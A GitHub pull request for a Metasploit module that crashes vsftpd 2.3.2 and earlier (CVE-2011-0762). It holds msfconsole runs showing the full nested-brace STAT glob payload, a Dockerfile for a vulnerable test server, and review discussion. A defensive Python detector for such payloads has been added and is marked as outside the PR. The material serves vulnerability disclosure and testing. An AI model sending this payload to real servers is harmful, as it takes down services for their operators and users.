CVE-2011-0762 VSFTPD DOS attack #18004

Merged
merged 22 commits into from May 29, 2023

rad10
Contributor

@rad10 rad10 commented May 17, 2023

Vulnerable Application

This is an auxiliary for DOSing a VSFTPD server from version 2.3.3 and below.

Verification Steps

  1. Start msfconsole
  2. use auxiliary/dos/ftp/vstfpd_232
  3. set rhosts
  4. set ftpuser
  5. set ftppass
  6. run

Scenarios

VSFTPD 2.3.2 - Arch Linux

msf6 > use auxiliary/dos/ftp/vsftpd_232
msf6 auxiliary(dos/ftp/vstfpd_232) > set rhosts 192.168.56.106
rhosts => 192.168.56.106
msf6 auxiliary(dos/ftp/vstfpd_232) > set verbose true 
verbose => true
msf6 auxiliary(dos/ftp/vstfpd_232) > run
[*] Running module against 192.168.56.106
[*] 192.168.56.106:21 - Connecting to FTP server 192.168.56.106:21...
[*] 192.168.56.106:21 - Connected to target FTP server.
[*] 192.168.56.106:21 - Authenticating as anonymous with password ...
[*] 192.168.56.106:21 - Sending password...
[*] 192.168.56.106:21 - Payload being sent: STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{
{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
[*] 192.168.56.106:21 - DDOS ended.
[*] Auxiliary module execution completed
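
A defensive check for the kind of STAT argument shown in the module output above, as an added example that is not part of this pull request or of Metasploit: it scans FTP control-channel lines for deeply nested brace or wildcard-heavy glob arguments. The thresholds, the command list beyond STAT, and the sample lines are assumptions constructed for illustration.

```python
# Thresholds are assumptions for illustration; tune them against real traffic.
MAX_BRACE_DEPTH = 4
MAX_WILDCARDS = 16
MAX_ARG_LEN = 512

# Commands whose argument a server may treat as a glob pattern (assumed list;
# the module output above shows STAT).
GLOB_COMMANDS = {"STAT", "LIST", "NLST"}

def glob_stats(arg):
    """Return (max brace nesting depth, wildcard count) for a command argument."""
    depth = max_depth = 0
    for ch in arg:
        if ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}" and depth > 0:
            depth -= 1
    return max_depth, arg.count("*") + arg.count("?")

def check_line(line):
    """Return (verb, depth, wildcards) if the line should be flagged, else None."""
    verb, _, arg = line.strip().partition(" ")
    verb = verb.upper()
    if verb not in GLOB_COMMANDS:
        return None
    depth, wildcards = glob_stats(arg)
    if depth > MAX_BRACE_DEPTH or wildcards > MAX_WILDCARDS or len(arg) > MAX_ARG_LEN:
        return verb, depth, wildcards
    return None

def scan(lines):
    """Return (line number, verb, depth, wildcards) for every flagged line."""
    return [(n, *hit) for n, line in enumerate(lines, 1) if (hit := check_line(line))]

# Constructed sample control-channel lines (not captured traffic).
SAMPLE = [
    "USER anonymous",
    "STAT /pub/*.txt",
    "LIST {a,b}/*.log",
    "stat " + "{{*}," * 8 + "{.}" + "}" * 8,
]

if __name__ == "__main__":
    for n, verb, depth, wildcards in scan(SAMPLE):
        print(f"line {n}: {verb} brace_depth={depth} wildcards={wildcards}")
```

The same counters can feed a proxy or IDS rule that rejects the command before it reaches the FTP daemon.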

@space-r7 space-r7 added the needs-linting The module needs additional work to pass our automated linting rules label May 17, 2023
@github-actions

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@rad10 rad10 requested review from bcoles and gwillcox-r7 May 17, 2023 16:10
@rad10
Contributor Author

rad10 commented May 20, 2023

So I've tested the module and it works now. So is anything missing for merging?

@jheysel-r7 jheysel-r7 self-assigned this May 23, 2023
@rad10
Contributor Author

rad10 commented May 23, 2023

If anyone is wanting to test this easily, here's a Dockerfile to make an image of the application data:

FROM archlinux:latest as build
RUN pacman -Sy --noconfirm gcc make libnsl
RUN curl -O https://security.appspot.com/downloads/vsftpd-2.3.2.tar.gz
RUN tar zxf vsftpd-2.3.2.tar.gz
WORKDIR /vsftpd-2.3.2
RUN make
RUN mkdir -p /usr/share/empty/
RUN chmod +x /vsftpd-2.3.2/vsftpd
RUN mv /vsftpd-2.3.2/vsftpd /bin/vsftpd
RUN mv /vsftpd-2.3.2/vsftpd.conf /etc/vsftpd.conf
RUN chown root:root /etc/vsftpd.conf
EXPOSE 21
CMD [ "/bin/vsftpd" ]

@jheysel-r7
Contributor

> If anyone is wanting to test this easily, here's a Dockerfile to make an image of the application data:
>
> FROM archlinux:latest as build
> RUN pacman -Sy --noconfirm gcc make libnsl
> RUN curl -O https://security.appspot.com/downloads/vsftpd-2.3.2.tar.gz
> RUN tar zxf vsftpd-2.3.2.tar.gz
> WORKDIR /vsftpd-2.3.2
> RUN make
> RUN mkdir -p /usr/share/empty/
> RUN chmod +x /vsftpd-2.3.2/vsftpd
> RUN mv /vsftpd-2.3.2/vsftpd /bin/vsftpd
> RUN mv /vsftpd-2.3.2/vsftpd.conf /etc/vsftpd.conf
> RUN chown root:root /etc/vsftpd.conf
> EXPOSE 21
> CMD [ "/bin/vsftpd" ]

Thank you for this! I just got this working and was just about to suggest adding similar steps to the vulnerable application section in the documentation. I'll add a suggestion to the docs with this Dockerfile, very nice and concise.

@gwillcox-r7 gwillcox-r7 removed their request for review May 24, 2023 17:06
@rad10
Contributor Author

rad10 commented May 29, 2023

Anything left before we're ready to launch?

@rad10 rad10 requested a review from jheysel-r7 May 29, 2023 16:36
@jheysel-r7
Contributor

> Anything left before we're ready to launch?

One last nitpick @rad10 - I know msf_tidy doesn't pick this up as being incorrect and there are multiple different ways of listing module options in the codebase. However, we're moving towards the following pattern:

## Options
### CA
The target certificate authority. The default value used by AD CS is `$domain-DC-CA`.
### CERT_TEMPLATE
The certificate template to issue, e.g. "User".
### ALT_DNS
Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.
### ALT_UPN
Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the
format `$username@$dnsDomainName`.
### PFX
Certificate to request on behalf of. This is a PKCS12 file (using the .pfx extension), such as a one generated by
previously running this module.
### ON_BEHALF_OF
Username to request on behalf of. This is in the format `$domain\\$username`.
### DigestAlgorithm
*This is an advanced option.*
The digest algorithm to use for cryptographic signing operations.

Where each module option is a subtitle of ## Options. I've added a suggestion. Thanks so much for being so responsive and accommodating throughout this review, it's really appreciated!

@jheysel-r7
Contributor

Final testing with latest changes:

msf6 > use auxiliary/dos/ftp/vsftpd_232
msf6 auxiliary(dos/ftp/vsftpd_232) > set ftpuser anonymous
ftpuser => anonymous
msf6 auxiliary(dos/ftp/vsftpd_232) > set ftppass ''
ftppass =>
msf6 auxiliary(dos/ftp/vsftpd_232) > set rhosts 172.16.199.141
rhosts => 172.16.199.141
msf6 auxiliary(dos/ftp/vsftpd_232) > set rport 8888
rport => 8888
msf6 auxiliary(dos/ftp/vsftpd_232) > options

Module options (auxiliary/dos/ftp/vsftpd_232):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FTPPASS                   no        The password for the specified username
   FTPUSER  anonymous        no        The username to authenticate as
   RHOSTS   172.16.199.141   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                       asploit.html
   RPORT    8888             yes       The target port (TCP)


View the full module info with the info, or info -d command.

msf6 auxiliary(dos/ftp/vsftpd_232) > run
[*] Running module against 172.16.199.141

[*] 172.16.199.141:8888 - sending payload
....
[+] 172.16.199.141:8888 - Stream was cut off abruptly. Appears DOS attack succeeded.
[*] Auxiliary module execution completed

@jheysel-r7 jheysel-r7 merged commit 0b9aff0 into rapid7:master May 29, 2023
30 checks passed
@jheysel-r7 jheysel-r7 added rn-modules release notes for new or majorly enhanced modules and removed needs-linting The module needs additional work to pass our automated linting rules labels May 29, 2023
@jheysel-r7
Contributor

jheysel-r7 commented May 29, 2023

Release Notes

This PR adds an auxiliary for DOSing a VSFTPD server from version 2.3.2 and below.

@rad10 rad10 deleted the vsftpd_232 branch June 2, 2023 17:01